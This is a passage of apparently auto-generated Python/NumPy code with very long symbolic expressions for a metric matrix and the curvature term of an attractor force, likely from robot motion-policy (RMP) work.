        [-x0*y0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, (w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + y0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2))), -y0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2],
        [-x0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, -y0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, (w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + z0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))]
    ])
    return M
def attract_xi_M(x, dx, sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon):
"""アトラクター力における曲率項を計算"""
x0 = x[0, 0]
y0 = x[1, 0]
z0 = x[2, 0]
x_norm = np.linalg.norm(x)
dx0 = dx[0, 0]
dy0 = dx[1, 0]
dz0 = dx[2, 0]
#sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon = 1, 1, 1, 1, 1, 1
xi_M = np.array([
[x_norm**(-61.0)*(dx0*(dx0*x0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dy0*y0 + dz0*z0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + 
w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 
dx0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 
13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dy0*(dz0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - 
w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dy0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dz0*(dy0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - 
exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dy0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dx0*sigma_alpha**2*sigma_gamma**2*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) 
+ dy0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dz0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dx0*sigma_alpha**2*sigma_gamma**2*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 
